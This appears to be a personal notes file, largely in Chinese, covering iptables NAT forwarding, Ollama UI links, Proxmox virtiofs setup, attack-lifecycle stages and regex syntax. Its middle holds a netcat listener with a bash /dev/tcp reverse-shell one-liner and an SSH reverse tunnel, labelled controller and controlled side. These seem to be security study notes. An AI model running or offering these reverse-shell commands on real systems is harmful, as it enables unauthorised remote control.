echo "1" > /proc/sys/net/ipv4/ip_forward
IF=vmbr0
PORT_FROM=80
PORT_TO=80
DEST=192.168.1.1
iptables -t nat -A POSTROUTING -o ${IF} -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport PORT_FROM -j DNAT --to-destination ${DEST}:${PORT_TO}
or
iptables -t nat -A PREROUTING -i $IF -p tcp --dport $PORT_FROM -j DNAT --to $DEST:$PORT_TO
iptables -t nat -A POSTROUTING -p tcp -d $DEST --dport $PORT_TO -j MASQUERADE
Page Assist - 本地 AI 模型的網頁介面
https://chromewebstore.google.com/detail/page-assist-a-web-ui-for/jfgfiigpkhlkbnfnbobbkinehhfdhndo
Just a simple HTML UI for Ollama
https://chromewebstore.google.com/detail/ollama-ui/cmgdpmlhgjhoadnonobjeekmfcehffco
https://github.com/ollama-ui/ollama-ui
Proxmox VE 設定
Datacenter - directory Mappings - Add
VM 設定
Hardware - Add - Virtiofs
Linux虛擬機設定
mount -t virtiofs host_shared /mnt/host_shared/
https://haveibeenpwned.com/
https://haveibeenpwned.com/Passwords
https://api.pwnedpasswords.com/range/
攻擊生命週期
1.偵察
2.初步刺探
3.建立立足點
4.提昇權限
5.內部偵察
6.橫向活動
7.保持進駐
8.任務達成
網路安全
1.保密性
2.完整性
3.可用性
4.不可否認性
5.認證
資料蒐集類型
1.日誌檔
2.歷史指令
3.暫存檔
4.組態設定檔
5.使用者資料
指令隱蔽方法
1.語法
2.邏輯
3.編碼加密
日誌相關指令
logger
eventcreate.exe
eventvwr.exe
eventvwr.msc
檔案系統監看
1.建立基準
2.偵測變化
3.自動化、通知
bash 連線方式
nc -l -p 8080 #控制端 remote
bash -i </dev/tcp/remote /8080 1>&0 2>&0 #受控端
SSH反向連接
ssh -RNf 12345:localhost:22 user@remote #受控端
ssh localhost -p 12345 #控制端
正規表示式
. 代表單一萬用字元
? 前面的任何項目出現一次或無
* 前面的任何項目出現一次以上或無
+ 前面的任何項目出現至少一次或以上
( ) 群聚 集合字元 (aaa|bbb)
[ ] 定義字元種類
[:alnum:] 數字和字母字元
[:alpha:] 純字母
[:cntrl:] 控制字元
[:digit:] 數字字元
[:graph:] 控制字元和空白字元以外
[:lower:] 小寫字元
[:print:] 控制字元以外字元
[:punct:] 標點符號字元
[:space:] 包含換行的空白字元
[:upper:] 大寫字元
[:xdigit:] 16進位字元
\b 界定字詞邊界
\s 空白
\S 非空白
\d 數字
\D 非數字
\w 字詞
\W 非字詞
\x 16進位數字
T{5, } 量詞/Quantifiers 項目出現的次數
^ 項目應出現字串開頭
$ 項目應出現字串結尾
回溯參照/back reference
egrep '<([A-Za-z]*)>.*</\1>' tags.txt
